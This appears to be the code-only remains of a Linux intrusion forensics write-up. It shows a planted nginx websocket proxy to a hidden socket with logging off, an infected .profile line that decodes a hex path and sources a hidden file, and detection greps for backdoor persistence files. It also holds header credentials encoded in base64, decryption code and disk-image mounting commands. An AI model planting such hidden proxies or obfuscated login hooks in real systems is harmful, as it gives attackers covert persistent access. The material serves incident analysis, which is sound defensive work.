location /ws/b3a4d3a2 {
  proxy_http_version 1.1;
  proxy_set_header Upgrade $http_upgrade;
  proxy_set_header Connection "upgrade";
  proxy_set_header Host               $host;
  proxy_set_header X-Forwarded-For    $remote_addr;
  access_log    off;
  log_not_found off;
  proxy_pass http://unix:/var/run/shm/evil.sock;
}

 proxy_set_header Upgrade $http_upgrade;
 proxy_set_header Connection "upgrade";
 proxy_pass http://unix:/var/run/shm/evil.sock;

lsof | grep /var/run/shm/evil.sock

payload      18653              root    4u     unix 0xffff74146a3b3743       0t0   25637138 /var/run/shm/evil.sock

lsof -p 18653 | grep cwd

a = document.createElement('a');
document.body.appendChild(a);
a.download = name;
a.href = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAOCAYAAAAmL5yKAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAABWSURBVDhPY0xISPh//0UOA7mAiVyNMH2jBjAwkBQGjD9KGBTEJ6OEO0kG2NvbMwCjnXwDsEU5SS5ANuDhjRCGJbPFSQsDdBfIyMhQZgDIQLK9QLWkDABPsQw5I+5qmAAAAABJRU5ErkJggg==";
a.click();

Received: from SB1P221MB1152.NAMP221.PROD.OUTLOOK.COM
 (3613:10b6:806:388::20) by BD0P221MB0288.NAMP221.PROD.OUTLOOK.COM with
 HTTPS; Thu, 20 Mar 2024 21:28:15 +0000
...
From: John Doe <[email protected]>
To: John Goe <[email protected]>
Subject: New Test
Date: Thu, 20 Mar 2024 21:28:15 +0000
Accept-Language: en-US
Content-Language: en-US
X-Ms-Exchange-Organization-Authmechanism: 04
X-Ms-Exchange-Organization-Authsource: BD0P221MB0288.NAMP221.PROD.OUTLOOK.COM
X-Ms-Has-Attach: yes
...
X-Entity-ID: WABIHdrtPzUrGNbwVwoPTQ==
X-Trusted-Header: c2VjcmV0X2xvZ2luOnNlY3JldF9wYXNzd29yZA==
X-Ms-Exchange-Organization-Scl: -1

find / -type f | egrep -a '/prng/((askpass|hook|x|ssh_login)\.sh|depth\.cfg|funcs|ptyspy_bin\.[a-z_0-9]+\-(linux|alpine|osx)|seed|ssh|thc_cli)'

/home/john/.config/prng/askpass.sh
/home/john/.config/prng/depth.cfg
/home/john/.config/prng/funcs
/home/john/.config/prng/hook.sh
/home/john/.config/prng/ptyspy_bin.aarch64-linux
/home/john/.config/prng/ptyspy_bin.armv6l-linux
/home/john/.config/prng/ptyspy_bin.i386-alpine
/home/john/.config/prng/ptyspy_bin.mips32-alpine
/home/john/.config/prng/ptyspy_bin.mips64-alpine
/home/john/.config/prng/ptyspy_bin.x86_64-alpine
/home/john/.config/prng/ptyspy_bin.x86_64-osx
/home/john/.config/prng/seed
/home/john/.config/prng/ssh
/home/john/.config/prng/ssh_login.sh
/home/john/.config/prng/thc_cli
/home/john/.config/prng/x.sh

egrep -aor '# DO NOT REMOVE THIS LINE\. SEED PRNGD|source.+2\>/dev/null #PRNGD' /

"# ~/.profile: executed by the command interpreter for login shells.
# DO NOT REMOVE THIS LINE. SEED PRNGD.
source "$(echo 2f686f6d652f6a6f686e2f2e636f6e6669672f70726e672f736565640a|/usr/bin/xxd -r -ps 2>/dev/null)" 2>/dev/null #PRNGD
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.

# the default umask is set in /etc/profile; for setting the umask
# for ssh logins, install and configure the libpam-umask package.
#umask 022

# if running bash
if [ -n ""$BASH_VERSION"" ]; then
    # include .bashrc if it exists
    if [ -f ""$HOME/.bashrc"" ]; then
        . ""$HOME/.bashrc""
    fi
fi

# set PATH so it includes user's private bin if it exists
if [ -d ""$HOME/bin"" ] ; then
    PATH=""$HOME/bin:$PATH""
fi

# set PATH so it includes user's private bin if it exists
if [ -d ""$HOME/.local/bin"" ] ; then
    PATH=""$HOME/.local/bin:$PATH""
fi"

cipher = AES.new(aes_key, AES.MODE_ECB)
    encr = b"\x00"*16
    initial_key = cipher.encrypt(encr) # your value here
 
    block_size = 16
    total_blocks = len(ciphered_data) // block_size
    decrypted_data = bytearray()
    previous_block = initial_key
 
    if total_blocks:
        # Decrypt all complete blocks
        for i in range(total_blocks):
            current_block = ciphered_data[i * block_size:(i + 1) * block_size]
            key = previous_block
            decr_block = cipher.decrypt(current_block)
            decrypted_data.extend(bytes(x ^ y for x, y in zip(decr_block, key)))
            previous_block = current_block
 
        # Handle the last block with ciphertext stealing
    if len(ciphered_data) % block_size > 0:
        last_full_block = previous_block
        if total_blocks:
            last_full_block = cipher.encrypt(last_full_block)[:len(ciphered_data) - (i + 1) * block_size] #take as much bytes off of the last full block (encrypted) as remained yet to decrypt (ciphertext)
            partial_block = ciphered_data[(i + 1) * block_size:len(ciphered_data)] #bytes left to decrypt, not a multiple of the block size
        else:
            last_full_block = cipher.encrypt(last_full_block)[:len(ciphered_data)]
            partial_block = ciphered_data[:len(ciphered_data)]
         
        stolen_block = bytes(x ^ y for x, y in zip(partial_block, last_full_block))
        decrypted_data.extend(stolen_block)

qemu-img convert -f #Исходный формат -O #Целевой формат #Файл-источник #Файл-получатель

VirtualBox: VBoxManage.exe internalcommands converttoraw

VMware: vmware-vdiskmanager -r ./source-image.vmdk -t 2 ./destination-image.raw

fdisk -l ./#путь к файлу

Sector size (logical/physical): 512 bytes / 512 bytes
    
./vm-disk-0.raw1 : start=        2048, size=   207618048, type=83
./vm-disk-0.raw2 : start=   207620096, size=     2095104, type=82

mount -o ro,loop,offset=1048576,sizelimit=106300440576 source /mountpoint